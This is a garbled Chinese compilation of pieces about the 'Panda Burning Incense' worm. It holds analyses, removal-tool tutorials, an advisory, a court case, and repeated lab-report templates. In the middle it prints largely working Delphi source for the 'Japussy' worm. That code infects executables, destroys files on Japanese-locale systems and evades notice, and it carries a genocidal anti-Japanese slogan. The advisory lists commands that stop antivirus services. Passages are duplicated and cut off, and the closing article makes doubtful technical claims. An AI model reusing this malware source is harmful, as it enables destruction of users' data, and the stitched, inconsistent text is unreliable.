Panda熊猫烧香病毒查杀实验

国家计算机病毒应急处理中心通过对互联网的监测发现，一伪装成“熊猫烧香”图案的蠕虫正在互联网上进行传播，已有数百万个人计算机用户和企业局域网遭受感染。

国家计算机病毒应急处理中心分析发现，该蠕虫为“威金”蠕虫的一个新变种。

该变种感染计算机系统后，可使系统中所有.exe文件都变成了一种奇怪的图案，该图案显示为“熊猫烧香”国家计算机病毒应急处理中心通过对互联网的监测发现，一伪装成“熊猫烧香”图案的蠕虫正在互联网上进行传播，已有数百万个人计算机用户和企业局域网遭受感染。

国家计算机病毒应急处理中心分析发现，该蠕虫为“威金”蠕虫的一个新变种。

该变种感染计算机系统后，可使系统中所有.exe文件都变成了一种奇怪的图案，该图案显示为“熊猫烧香”，同时受感染的计算机系统会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致整个局域网瘫痪，无法正常使用。

该蠕虫先后出现很多变种，再出现后的短时期内迅速传播，遭受感染的用户难于彻底清除，给其工作带来诸多不便。

蠕虫情况分析如下：病毒名称：Worm_Viking中文名：“熊猫烧香”其他名称：Worm/Viking（江民）Worm.WhBoy.h （金山）PE_FUJACKS （趋势）Worm.Nimaya （瑞星）W32/Fujacks （McAfee）病毒类型：蠕虫感染系统：Windows 9X/ Windows ME/ Windows NT/ Windows 2000/Windows XP/ Windows 2003病毒特性：“熊猫烧香”是蠕虫“威金”的一个变种，是一个由Delphi 工具编写的蠕虫，它会感染计算机系统中后缀名为exe、com、pif、src、html、asp等文件,它还会终止一些计算机系统中安装的防病毒软件和防火墙的进程。

1、生成病毒文件蠕虫运行后在%System%目录下生成文件spoclsv.exe，并且在每个文件夹下面生成desktop_.ini 文件，里面标记着病毒发作日期。

【工具】:Olydbg1.1、IDA5.0【任务】:病毒分析以及解决方案【操作平台】:Windows2003server【作者】:LoveBoom[DFCG][FCG][CUG]【链接】:N/A【简要说明】:"离开党和人民一年"、荒废了一年，2006年可所谓沉迷于游戏从帝国到星际，总是追求着自己所谓的目标，而今回头看却发现不但没有达到自己的目标，反而是离生活越走越远了。

现在动手写写也觉得自己穷词:­(。

2006过了，不想自己的2007也是这样碌碌无为的过着。

关于这个病毒，我想很多朋友都知道，这个病毒在2007年初闹的比较凶，很多朋友曾经中过这病毒。

这次我给大家带来的文章就是讲讲这个病毒。

看看这病毒到底是怎么回事，我们应该怎么去处理这病毒。

【病毒分析】:概要:这病毒我最早在10月底时接触，那时这病毒并没有现在这样流行(也许是病毒刚出来吧)。

曾经几个月的发展，前几天从同事那拿了几个新变种看了会，发现病毒和早期的版本相差比较大。

根据病毒的差异，我自己将病毒分为:ABCD4个变种。

各变种的不同处如下:A病毒将自身复制为%System32%\FuckJacks.exe,然后感染除特殊文件夹之外的文件夹中的可执行文件。

B病毒将自身复制为%System32%\Drivers\spoclsv.exe,感染时在c盘根目录下生成感染标记文件。

C病毒不再感染用户系统中的可执行文件，而是感染用户系统中的脚本病毒(这样的危害更大);在每个感染后的文件夹中写下感染标记文件。

D感染用户可执行文件时不再使用A和B版本中的直接捆绑感染。

用户中毒后可执行程序的图标不改变(a和b版本感染后可执行文件的图标都变成熊猫烧香)。

今天我分析的就是C版本(下次有空我将整理出A版本的分析资料),小版本可能会有所不同，因此如果你发现你机器上的和我所述的相似但不完全一样也是正常的。

中毒表象:以下几个特征为中毒的表现:１、在系统中的每分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。

熊猫烧⾹病毒样本分析前⾔最近学校通知不开学，⽹课也不想上。

学习逆向也有段时间了，就想着找点东西练⼀下⽔平不⾼。

找了个病毒分析⼀⽐较经典的病毒分析。

我看⽹上有很多关于熊猫烧⾹病毒的分析，但都是侧重于对病毒功能以及影响的总结，具体分析⽅法并未提及。

本⽂主要基本信息动态分析分析⼯具以及环境OD PEIDVMware xp 虚拟机详细分析过程与思路查看⽂件基本信息在虚拟机中⽤PEID 打开病毒样本⽂件发现其⽆壳并且是Delphi 编写的，Delphi 编译器编译的程序有⼏个特点。

第⼀： 其函数默认调⽤约定为Register ，特点为函数参数是通过寄存器传⼊的。

第⼆： ⼀般Delphi 其字符串存储地址的负偏移⼀个dword长度处，存放字符串的长度。

打开OD 载⼊病毒样本⽂件来到程序⼊⼝点后我们进⾏进⼀步分析，我们看到⼊⼝点处有 函数① 和 函数②，其中函数②连续调⽤了三次。

我们F8向下执⾏，并分别进⼊两个函数分析其功能。

进⼊函数①我们发现其主要功能就是调⽤GetModuleHandleA()获得程序基地址（及程序实例句柄）向下继续分析函数②，在调⽤函数②时我们发现其传⼊了两个参数，我们在数据窗⼝中分析发现参数有⼀个为⼀串字符串：“ ***武*汉*男*⽣*感*染*下*载*者*** ". 我们F7进⼊函数内部分析发现其就时将eax 参数地址下的字符串进⾏复制侧重于对熊猫烧⾹病毒逆向分析过程中的思路和⽅法的分享所以我们知道了这三个参数是字符串复制函数，F8向下步过这些函数后。

他们把字符串都复制到了⼀块连续的内存中。

我们可以在数据窗⼝中观察这些字符的内容。

我们接着往下分析，发现两段相同的代码段，只是参数不同。

也就是当程序执⾏完函数0x405360和函数0x404018后如果je不成⽴则结束进程（猜测应该为病毒程序的⾃效验部分）。

我们分别进⼊连个函数分析。

我们先分析函数0x405360，函数的两个参数分别指向两个字符串⼀个是“xboy”，另⼀个如下。

熊猫烧香病毒之专杀工具的编写教程通过对熊猫烧香的行为分析，这里仅针对所得结果，来进行专杀工具的编写。

本节课我们会学习使用C++来写一个简单的“熊猫烧香”专杀系统。

实验目的：结合本篇文章的知识点，能够彻底掌握文章所讲述的编写杀毒软件的方法。

实验思路：1.理解专杀工具所需要实现的功能2.利用VC++编写专杀工具3.结合Process Monitor验证专杀工具实验步骤：1、病毒行为回顾与归纳这里我们首先回顾一下病毒的行为：**病毒行为1：**病毒本身创建了名为`spoclsv.exe`的进程，该进程文件的路径为：C:WINDOWSsystem32driversspoclsv.exe**病毒行为2：**在命令行模式下使用`net share`命令来取消系统中的共享。

**病毒行为3：**删除安全类软件在注册表中的启动项。

**病毒行为4：**在注册表:HKCUSoftwareMicrosoftWindowsCurrentVersionRun中创建svcshare用于在开机时启动位于`C:WINDOWSsystem32driversspoclsv.exe`的病毒程序。

**病毒行为5：**修改注册表，使得隐藏文件无法通过普通的设置进行显示，该位置为：HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL 病毒将`CheckedValue`的键值设置为了0。

**病毒行为6：**将自身拷贝到根目录，并命名为`setup.exe`，同时创建`autorun.inf`用于病毒的启动，这两个文件的属性都是“隐藏”。

**病毒行为7：**在一些目录中创建名为`Desktop_.ini`的隐藏文件。

**病毒行为8：**向外发包，连接局域网中其他机器。

纵观以上八点行为，这里需要说明的是，其中的第二点行为，由于我不知道用户计算机在中毒前的设置，因此这条我打算忽略。

Nimaya（熊猫烧香）病毒特点及解决方法近期校园网中大量的出现了“熊猫烧香”病毒及其新变种，现将新变种的特征和感染现象作出分析，供大家在工作中参考。

一．感染现象及传播途径“熊猫烧香”及其变种是通过局域网内的网络共享来感染终端计算机的蠕虫病毒，主要感染的目标系统为windows 2000 和XP。

病毒会在系统的所以盘符或最后一个盘符下生成一个熊猫烧香或常见可执行文件的图标（如杀毒软件等）,文件名为setup.exe/gamesetup.exe/autorun.exe等的可执行文件来诱导用户点击执行,释放后继而感染word、execl等后缀名为.exe的文件，使用户无法正常应用工作软件。

该病毒修改文件夹属性使“显示所有隐藏文件”和“显示受保护的系统文件选项”失效。

二．病毒特点1、病毒感染终端后将自身复制到Windows文件夹下,文件名为：%SystemRoot%\autorun.inf 并将其属性改为隐藏2、病毒感染终端后，病毒将病毒体复制到为以下文件：%SystemRoot%\setup.exe并将其属性改为隐藏3、病毒在每个分区下生成gamesetup.exe/set.exe/autorun.exe文件,并在C:\Documents and Settings\Administrator\Local Settings\Temp下加载zt.exe和w1.exe或ztw1.exe等文件4、病毒会在c：\winnt\system32\drivers\文件夹下生成spoclv.exe文件。

5、病毒通过添加如下注册表项实现病毒开机自动运行:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "load"="C:\\WINNT\\zt.exe"或w1.ext””[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"="C:\\WINNT\\rundl132.exe"7、枚举以下杀毒软件进程名，查找到后终止其进程：Ravmon.exe、Eghost.exe、Mailmon.exe、KA VPFW.EXE、IPARMOR.EXE、Ravmond.exe、KV、Mcshield.exe8、同时病毒尝试利用以下命令终止相关杀病毒软件并删除服务：net stop "Kingsoft AntiVirus Service"net stop “Ravservice”9、发送arp探测数据，判断网络状态，网络可用时，枚举内网所有共享主机，并使用自带的口令库猜测破解\\IPC$、\admin$等共享目录，连接成功后进行网络感染。

熊猫烧香案例分析一、基本案情被告人李俊于2003年开始自学计算机编程技术，并经常向自己的好朋友、也是本案被告人之一的雷磊请教。

2006年10月，被告人李俊从武汉某软件技术开发培训学校毕业后，便将自己以前在国外某网站下载的计算机病毒源代码调出来进行研究、修改，在对此病毒进行修改的基础上完成了“熊猫烧香”电脑病毒的制作，并采取将该病毒非法挂在别人网站上及赠送给网友等方式在互联网上传播。

“熊猫烧香”病毒具有本机感染功能、局域网感染功能及u盘感染功能，并能中止许多反病毒软件和防火墙的运行，中了该病毒的电脑会自动链接访问指定的网站、下载恶意程序等。

其后，李俊请雷磊对该病毒提修改建议。

雷磊认为该病毒存在两个问题，一是改变被感染文件的图标，二是没有隐藏病毒进程。

电脑感染了该病毒后，很容易被电脑用户发现，建议李俊从这两个方面对“熊猫烧香”病毒进行修改，但没有告诉李俊具体的修改方法。

2006年11月中旬，李俊在互联网上叫卖该病毒，同时也请被告人王磊及其他网友帮助出售该病毒。

王磊、李俊及其网友一共卖出了约三十个“熊猫烧香”病毒。

其中，王磊帮李俊卖出了三个“熊猫烧香”病毒，并先后三次共汇款给李俊人民币1450元。

此外，李俊还赠送给其他网友约十个“熊猫烧香”病毒。

随着病毒的出售和赠送给网友，“熊猫烧香”病毒迅速在互联网上传播，导致自动链接访问李俊个人网站的流量大幅上升。

王磊得知此情形后，提出为李俊卖“流量”，并联系被告人张顺购买李俊网站的“流量”，所得收入由王磊和李俊平分。

为了提高访问李俊网站的速度，减少网络拥堵，王磊和李俊商量后，由王磊化名董磊为李俊的网站在南昌锋讯网络科技有限公司租了一个2G内存、百兆独享线路的服务器，租金由李俊、王磊每月各负担800元。

张顺购买李俊网站的流量后，先后将九个游戏木马（也就是盗号木马）通过互联网发给王磊，王磊将这九个游戏木马转发给李俊，然后由李俊将这九个游戏木马挂在其个人网站上，盗取自动链接访问其网站的游戏玩家的“游戏信封（即含有游戏账号和密码的电子邮件）”，游戏木马将盗取的“游戏信封”自动地发给张顺，张顺则将盗取的“游戏信封”进行拆封、转卖，从而获取利益。

熊猫烧⾹病毒详解（附源码及学习资料）这⼏天⼩编在研究下病毒，源码拿出来和⼤家分享⼀下。

温馨提⽰：亮点最后！今天在OSC看到有⼈共享熊猫烧⾹的源码，⽤Delphi写的，真的是跨平台啊，犹对Japanese操作系统破坏最甚，字⾥⾏间留露出作者的愤青情绪啊，⼤体的看了下，主要是通过拷贝到Windows系统⽬录中，注册表添加⾃启动的蠕⾍病毒，通过VB调⽤Windows的Outlook发送邮件，进⽽达到传播病毒，原始的病毒是将exe的图标改成熊猫烧⾹的图标，并没有其他功效，真正破坏性的都是后期制作的。

随着编程语⾔的简化和提⾼，写个病毒当个骇客，再也不是梦了，主要你要了解病毒是怎么传播的，如何保证⾃⼰不会被轻易的杀掉，对Windows的漏洞也要有很深的研究，这样才能写出⼀个骇⼈听闻的病毒，但是写出来也不要张扬，⾃⼰娱乐下就好了，被他⼈恶意利⽤可不是闹着玩的。

不禁想起了之前微软的⼀个严重漏洞，迟迟四年也没有发现，漏洞是当OS连续运⾏49天之后会死机，为什么没有发现呢，因为其他的漏洞导致os还未运⾏就么久就已经死了，原因是每毫⽶加⾐的计时器，在49天之后，int型就溢出了，导致系统崩溃。

随便说说，看下源码，留着以后研究：program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的⼤⼩IconOffset = $12EB8; //PE⽂件主图标的偏移量//在我的Delphi5 SP1上⾯编译得到的⼤⼩，其它版本的Delphi可能不同//查找2800000020的⼗六进制字符串可以找到主图标的偏移量{HeaderSize = 38912; //Upx压缩过病毒体的⼤⼩IconOffset = $92BC; //Upx压缩过PE⽂件主图标的偏移量//Upx 1.24W ⽤法: upx -9 --8086 Japussy.exe}IconSize = $2E8; //PE⽂件主图标的⼤⼩--744字节IconTail = IconOffset + IconSize; //PE⽂件主图标的尾部ID = $44444444; //感染标记//垃圾码，以备写⼊Catchword = ''''''''''''''''If a race need to be killed out, it must be Yamato. '''''''''''''''' +''''''''''''''''If a country need to be destroyed, it must be Japan! '''''''''''''''' +''''''''''''''''*** W32.Japussy.Worm.A ***'''''''''''''''';{$R *.RES}function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;stdcall; external ''''''''''''''''Kernel32.dll''''''''''''''''; //函数声明varTmpFile: string;Si: STARTUPINFO;Pi: PROCESS_INFORMATION;IsJap: Boolean = False; //⽇⽂操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False;Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) thenExit;if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x{ 在流之间复制 }procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer);varsCurPos, dCurPos: Integer;beginsCurPos := Src.Position;dCurPos := Dst.Position;Src.Seek(sStartPos, 0);Dst.Seek(dStartPos, 0);Dst.CopyFrom(Src, Count);Src.Seek(sCurPos, 0);Dst.Seek(dCurPos, 0);end;{ 将宿主⽂件从已感染的PE⽂件中分离出来，以备使⽤ }procedure ExtractFile(FileName: string);varsStream, dStream: TFileStream;begintrysStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); trydStream := TFileStream.Create(FileName, fmCreate);trysStream.Seek(HeaderSize, 0); //跳过头部的病毒部分dStream.CopyFrom(sStream, sStream.Size - HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;{ 填充STARTUPINFO结构 }procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);beginSi.cb := SizeOf(Si);Si.lpReserved := nil;Si.lpDesktop := nil;Si.lpTitle := nil;Si.dwFlags := STARTF_USESHOWWINDOW;Si.wShowWindow := State;Si.cbReserved2 := 0;Si.lpReserved2 := nil;end;{ 发带毒邮件 }procedure SendMail;begin//哪位仁兄愿意完成之？end;{ 感染PE⽂件 }procedure InfectOneFile(FileName: string);varHdrStream, SrcStream: TFileStream;IcoStream, DstStream: TMemoryStream;iID: LongInt;aIcon: TIcon;Infected, IsPE: Boolean;i: Integer;Buf: array[0..1] of Char;begintry //出错则⽂件正在被使⽤，退出if CompareText(FileName, ''''''''''''''''JAPUSSY.EXE'''''''''''''''') = 0 then //是⾃⼰则不感染 Exit;Infected := False;IsPE := False;SrcStream := TFileStream.Create(FileName, fmOpenRead);tryfor i := 0 to $108 do //检查PE⽂件头beginSrcStream.Seek(i, soFromBeginning);SrcStream.Read(Buf, 2);if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记IsPE := True; //是PE⽂件Break;end;end;SrcStream.Seek(-4, soFromEnd); //检查感染标记SrcStream.Read(iID, 4);if (iID = ID) or (SrcStream.Size < 10240) then //太⼩的⽂件不感染Infected := True;finallySrcStream.Free;end;if Infected or (not IsPE) then //如果感染过了或不是PE⽂件则退出Exit;IcoStream := TMemoryStream.Create;DstStream := TMemoryStream.Create;tryaIcon := TIcon.Create;try//得到被感染⽂件的主图标(744字节)，存⼊流aIcon.ReleaseHandle;aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream := TFileStream.Create(FileName, fmOpenRead);//头⽂件HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try//写⼊病毒体主图标之前的数据CopyStream(HdrStream, 0, DstStream, 0, IconOffset);//写⼊⽬前程序的主图标CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);//写⼊病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);//写⼊宿主程序CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);//写⼊已感染的标记DstStream.Seek(0, 2);iID := $44444444;DstStream.Write(iID, 4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName); //替换宿主⽂件DstStream.Free;end;except;end;end;{ 将⽬标⽂件写⼊垃圾码后删除 }procedure SmashFile(FileName: string);varFileHandle: Integer;i, Size, Mass, Max, Len: Integer;begintrySetFileAttributes(PChar(FileName), 0); //去掉只读属性FileHandle := FileOpen(FileName, fmOpenWrite); //打开⽂件trySize := GetFileSize(FileHandle, nil); //⽂件⼤⼩i := 0;Randomize;Max := Random(15); //写⼊垃圾码的随机次数if Max < 5 thenMax := 5;Mass := Size div Max; //每个间隔块的⼤⼩Len := Length(Catchword);while i < Max dobeginFileSeek(FileHandle, i * Mass, 0); //定位//写⼊垃圾码，将⽂件彻底破坏掉finallyFileClose(FileHandle); //关闭⽂件end;DeleteFile(PChar(FileName)); //删除之exceptend;end;{ 获得可写的驱动器列表 }function GetDrives: string;varDiskType: Word;D: Char;Str: string;i: Integer;beginfor i := 0 to 25 do //遍历26个字母beginD := Chr(i + 65);Str := D + '''''''''''''''':'''''''''''''''';DiskType := GetDriveType(PChar(Str));//得到本地磁盘和⽹络盘if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) thenResult := Result + D;end;end;{ 遍历⽬录，感染和摧毁⽂件 }procedure LoopFiles(Path, Mask: string);vari, Count: Integer;Fn, Ext: string;SubDir: TStrings;SearchRec: TSearchRec;Msg: TMsg;function IsValidDir(SearchRec: TSearchRec): Integer;beginif (SearchRec.Attr <> 16) and ( <> ''''''''''''''''.'''''''''''''''') and( <> ''''''''''''''''..'''''''''''''''') thenResult := 0 //不是⽬录else if (SearchRec.Attr = 16) and ( <> ''''''''''''''''.'''''''''''''''') and( <> ''''''''''''''''..'''''''''''''''') thenResult := 1 //不是根⽬录else Result := 2; //是根⽬录end;beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) thenbeginrepeatPeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列，避免引起怀疑if IsValidDir(SearchRec) = 0 thenbeginFn := Path + ;Ext := UpperCase(ExtractFileExt(Fn));if (Ext = ''''''''''''''''.EXE'''''''''''''''') or (Ext = ''''''''''''''''.SCR'''''''''''''''') thenbeginInfectOneFile(Fn); //感染可执⾏⽂件endelse if (Ext = ''''''''''''''''.HTM'''''''''''''''') or (Ext = ''''''''''''''''.HTML'''''''''''''''') or (Ext = ''''''''''''''''.ASP'''''''''''''''') then begin//感染HTML和ASP⽂件，将Base64编码后的病毒写⼊//感染浏览此⽹页的所有⽤户//哪位⼤兄弟愿意完成之？endelse if Ext = ''''''''''''''''.WAB'''''''''''''''' then //Outlook地址簿⽂件begin//获取Outlook邮件地址endelse if Ext = ''''''''''''''''.ADC'''''''''''''''' then //Foxmail地址⾃动完成⽂件begin//获取Foxmail邮件地址endelse if Ext = ''''''''''''''''IND'''''''''''''''' then //Foxmail地址簿⽂件begin//获取Foxmail邮件地址if IsJap then //是倭⽂操作系统beginif (Ext = ''''''''''''''''.DOC'''''''''''''''') or (Ext = ''''''''''''''''.XLS'''''''''''''''') or (Ext = ''''''''''''''''.MDB'''''''''''''''') or (Ext = ''''''''''''''''.MP3'''''''''''''''') or (Ext = ''''''''''''''''.RM'''''''''''''''') or (Ext = ''''''''''''''''.RA'''''''''''''''') or(Ext = ''''''''''''''''.WMA'''''''''''''''') or (Ext = ''''''''''''''''.ZIP'''''''''''''''') or (Ext = ''''''''''''''''.RAR'''''''''''''''') or (Ext = ''''''''''''''''.MPEG'''''''''''''''') or (Ext = ''''''''''''''''.ASF'''''''''''''''') or (Ext = ''''''''''''''''.JPG'''''''''''''''') or (Ext = ''''''''''''''''.JPEG'''''''''''''''') or (Ext = ''''''''''''''''.GIF'''''''''''''''') or (Ext = ''''''''''''''''.SWF'''''''''''''''') or (Ext = ''''''''''''''''.PDF'''''''''''''''') or (Ext = ''''''''''''''''.CHM'''''''''''''''') or (Ext = ''''''''''''''''.AVI'''''''''''''''') then SmashFile(Fn); //摧毁⽂件end;end;end;//感染或删除⼀个⽂件后睡眠200毫秒，避免CPU占⽤率过⾼引起怀疑Sleep(200);until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);SubDir := TStringList.Create;if (FindFirst(Path + ''''''''''''''''*.*'''''''''''''''', faDirectory, SearchRec) = 0) thenbeginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add();until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);Count := SubDir.Count - 1;for i := 0 to Count doLoopFiles(Path + SubDir.Strings + '''''''''''''''''''''''''''''''', Mask);FreeAndNil(SubDir);end;{ 遍历磁盘上所有的⽂件 }procedure InfectFiles;varDriverList: string;i, Len: Integer;beginif GetACP = 932 then //⽇⽂操作系统IsJap := True; //去死吧！DriverList := GetDrives; //得到可写的磁盘列表Len := Length(DriverList);while True do //死循环beginfor i := Len downto 1 do //遍历每个磁盘驱动器LoopFiles(DriverList + '''''''''''''''':'''''''''''''''', ''''''''''''''''*.*''''''''''''''''); //感染之SendMail; //发带毒邮件Sleep(1000 * 60 * 5); //睡眠5分钟end;end;{ 主程序开始 }beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体⾃⼰if CompareText(ExtractFileName(ParamStr(0)), ''''''''''''''''Japussy.exe'''''''''''''''') = 0 then InfectFiles //感染和发邮件else //已寄⽣于宿主程序上了，开始⼯作beginTmpFile := ParamStr(0); //创建临时⽂件Delete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + ''''''''''''''''.exe''''''''''''''''; //真正的宿主⽂件，多⼀个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, ''''''''''''''''.'''''''''''''''', Si, Pi); //创建新进程运⾏之InfectFiles; //感染和发邮件end;end.“熊猫烧⾹”，这是⼀个感染型的蠕⾍病毒，它能感染系统中exe，com，pif，src，html，asp等⽂件，它还能中⽌⼤量的反病毒软件进程并且会删除扩展名为gho的⽂件，该⽂件是⼀系统备份⼯具GHOST的备份⽂件，使⽤户的系统备份⽂件丢失。

《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。

现将实验报告撰写的有关内容说明如下：1、实验报告模板为电子版。

2、下载统一的实验报告模板，学生自行完成撰写和打印。

报告的首页包含本次实验的一般信息：组号：例如：2-5 表示第二班第5组。

实验日期：例如：05-10-06 表示本次实验日期。

(年-月-日)……实验编号：例如：表示第一个实验。

实验时间：例如：2学时表示本次实验所用的时间。

实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。

模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。

续页不再需要包含首页中的实验一般信息。

3、实验报告正文部分具体要求如下：一、实验目的本次实验所涉及并要求掌握的知识点。

二、实验环境实验所使用的设备名称及规格，网络管理工具简介、版本等。

三、实验内容与实验要求实验内容、原理分析及具体实验要求。

四、实验过程与分析根据具体实验，记录、整理相应命令、运行结果等，包括截图和文字说明。

详细记录在实验过程中发生的故障和问题，并进行故障分析，说明故障排除的过程及方法。

五、实验结果总结对实验结果进行分析，完成思考题目，总结实验的心得体会，并提出实验的改进意见。

1）掌握熊猫烧香病毒的工作原理和感染方法；2）掌握手工清除熊猫病毒的基本方法。

目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验内容与实验要求蠕虫原理1）蠕虫定义2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。

这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。

《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。

现将实验报告撰写的有关内容说明如下：1、实验报告模板为电子版。

2、下载统一的实验报告模板，学生自行完成撰写和打印。

报告的首页包含本次实验的一般信息：组号：例如：2-5 表示第二班第5组。

实验日期：例如：05-10-06 表示本次实验日期。

(年-月-日)……实验编号：例如：表示第一个实验。

实验时间：例如：2学时表示本次实验所用的时间。

实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。

模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。

续页不再需要包含首页中的实验一般信息。

3、实验报告正文部分具体要求如下：1）掌握熊猫烧香病毒的工作原理和感染方法；2）掌握手工清除熊猫病毒的基本方法。

目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验内容与实验要求蠕虫原理1）蠕虫定义2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。

这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。

蠕虫病毒是自包含的程序(或是一套程序)，它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。

请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，有两种类型的蠕虫：主机蠕虫与网络蠕虫。

主计算机蠕虫完全包含在它们运行的计算机中，并且使用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷贝运行)，这种蠕虫有时也叫"野兔"。

熊猫烧香病毒样本引言熊猫烧香病毒（也称为Panda Burning Incense，简称Panda）是一种自2007年开始在中国传播的计算机病毒。

熊猫烧香病毒主要通过U盘传播，曾在全球范围内造成了大量的计算机破坏和数据丢失。

本文将探讨熊猫烧香病毒的样本特征及其影响。

病毒样本特征熊猫烧香病毒的样本特征包括以下几个方面：1. 文件扩展名熊猫烧香病毒的样本通常将感染的文件扩展名修改为.exe，以隐藏病毒的真实身份。

这样一来，用户在打开感染的文件时就会执行病毒的代码。

2. 病毒行为熊猫烧香病毒的样本会在感染时将自身复制到系统目录或其他常用目录下，并修改系统注册表以实现开机自启动。

同时，它会搜索用户U盘下的文件，并将自身复制到U盘的根目录和所有子目录中，以便在其他计算机上传播。

3. 源代码特征熊猫烧香病毒的样本通常通过反汇编分析发现它的源代码中包含了大量与计算机破坏行为相关的函数。

这些函数包括删除文件、格式化磁盘、修改系统配置等，可导致计算机系统崩溃或丢失重要数据。

熊猫烧香病毒的影响熊猫烧香病毒的传播速度非常快，曾在短时间内感染了大量的计算机系统。

它的传播方式主要是通过U盘，当感染的U盘插入其他计算机时，病毒就会复制到新的计算机中，并继续传播。

由于熊猫烧香病毒的源代码中包含了大量的破坏性函数，一旦感染计算机系统，就会对系统稳定性和数据安全造成极大威胁。

病毒可以删除关键系统文件，导致系统无法正常启动；它还可以格式化磁盘，使用户的数据永久丢失。

因此，熊猫烧香病毒对个人和组织的计算机系统造成了重大影响。

预防和应对策略针对熊猫烧香病毒的传播和影响，以下是一些预防和应对策略：1.更新杀毒软件：定期更新杀毒软件，以保持对新型病毒的识别和防御能力。

2.谨慎使用U盘：避免使用未知来源的U盘，并定期对U盘进行杀毒扫描。

3.远离非法下载：避免下载非法软件和盗版资源，以减少感染病毒的风险。

4.定期备份数据：定期备份重要数据，以防止数据丢失。